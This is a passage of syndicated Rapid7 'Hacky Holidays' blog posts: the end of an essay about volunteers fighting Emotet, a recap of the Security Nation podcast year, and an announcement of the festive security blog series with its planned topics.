The Internet connects everyone and everything with no centralized control. We put it together that way, and there’s clearly no grand plan to make it secure. So we step up. Every time the malware operation Emotet resurfaces, a group of security researchers and system administrators reunites to fight it. (The only name we really know is what they call themselves: “Cryptolaemus.” That’s a mealy bug that goes after unhealthy plants.)

My father-in-law sent a $300 gift card to a hacker. We’re easy marks, ruled by emotions that haven’t changed much since we were cave-dwelling Paleolithic hominins.

But we’re also us. You.

Whatever winter holiday you celebrated, here’s hoping it was a good one. And that you raised a glass to all the good folks, the good fight. Don’t stop believing.


Get the latest stories, expertise, and news about security today.

More Hacky Holidays blogs

Hacky Holidays: Celebrating the Best of Security Nation [Video]

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2021/12/13/hacky-holidays-celebrating-the-best-of-security-nation-video/

Hacky Holidays: Celebrating the Best of Security Nation [Video]

Most of us allow ourselves a few extra indulgences around the holidays — so despite my best editorial sensibilities, I’m letting myself indulge here in a well-deserved and sincerely meant cliche: For those of us who work on the Security Nation podcast, it really is a gift that keeps on giving.

Getting to hear our research and policy champions Jen Ellis and Tod Beardsley chat with some of the most thoughtful and influential people in cybersecurity on a biweekly basis is a welcome reminder of how vibrant and forward-thinking the security community is — especially during a time when virtual meetings and at-home workweeks are still the norm for most of us, and our work lives still feel more isolated than they once did.

To wrap up this year of podcasting, Security Nation’s Producer Jennifer Carson (who’s also a Senior Solutions Engineer here at Rapid7) and I thought it would be fun to convince Jen and Tod to let us turn the tables and interview them for a change. Sure, it was a somewhat transparent attempt to win ourselves a few moments in the spotlight, but it also gave us a chance to get together and reminisce about the year’s podcasting exploits. We covered:

  • How Jen and Tod got started in the podcasting game
  • The biggest security stories we covered this year
  • Jen and Tod’s most memorable podcast moments from 2021
  • The episode that made our normally fearless hosts tear up
  • Why PCI DSS compliance is more exciting than you might think
  • Who our dream guests are for 2022
  • And much more!

Check out the full conversation, see all of our shining faces, and get excited for what’s to come in 2022.

Hacky Holidays: Celebrating the Best of Security Nation [Video]

Show notes

Want More Inspiring Stories From the Security Community?

Subscribe to Security Nation Today

Hacky Holidays From Rapid7! Announcing Our New Festive Blog Series

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2021/12/02/hacky-holidays-from-rapid7-announcing-our-new-festive-blog-series/

Hacky Holidays From Rapid7! Announcing Our New Festive Blog Series

The holiday season often inspires reflection on the year coming to a close — but with the new year approaching, this season can also signal the opportunity for a fresh start.

In that spirit, we’re announcing a refreshed theme and approach to our annual holiday blog series: Hacky Holidays!

While we’ll always treasure the years of HaXmas, we wanted to do something more inclusive this year, so infosec practitioners from all walks of life can take part, regardless of what year-end observances you might keep. The change also gives us an opportunity to expand our publishing dates outside the traditional 12 Days of Christmas, so we can supply you with festively themed security content all season long — we’ll be running Hacky Holidays here on the Rapid7 blog throughout the whole month of December.

Our greatest holiday hits

Before we tell you more about the exciting content we have planned for the inaugural edition of Hacky Holidays, let’s pay a little homage to HaXmas and take a look at some of our holiday highlights from years past.

  • We gave you some tips for how to fill the role of sysadmin for your non-security-minded family (without going totally crazy).
  • We told the tale of Kevin the Elf, admin for Santa’s master list, who receives a suspicious email claiming to come from the Claus himself.

Hacky Holidays From Rapid7! Announcing Our New Festive Blog Series

What’s waiting under the tree this year

Now that we’ve got you in the spirit of cybersecurity cheer, here’s a look ahead at what we have planned for the inaugural Hacky Holidays.

  • Our team’s predictions for what 2022 might hold for security pros
  • A look back at the latest season of Security Nation — where some behind-the-mic personalities turn the tables to interview Jen and Tod
  • A deep dive into some of the inspiring ways security pros are giving back to the community
  • An brief tutorial on membership inference for neural networks from our resident AI expert, Erick Galinkin
  • A wrap-up of all things Metasploit from 2021
  • And much more!

Check back with us throughout the month so you don’t miss out on the Hacky Holiday cheer!


Get the latest stories, expertise, and news about security today.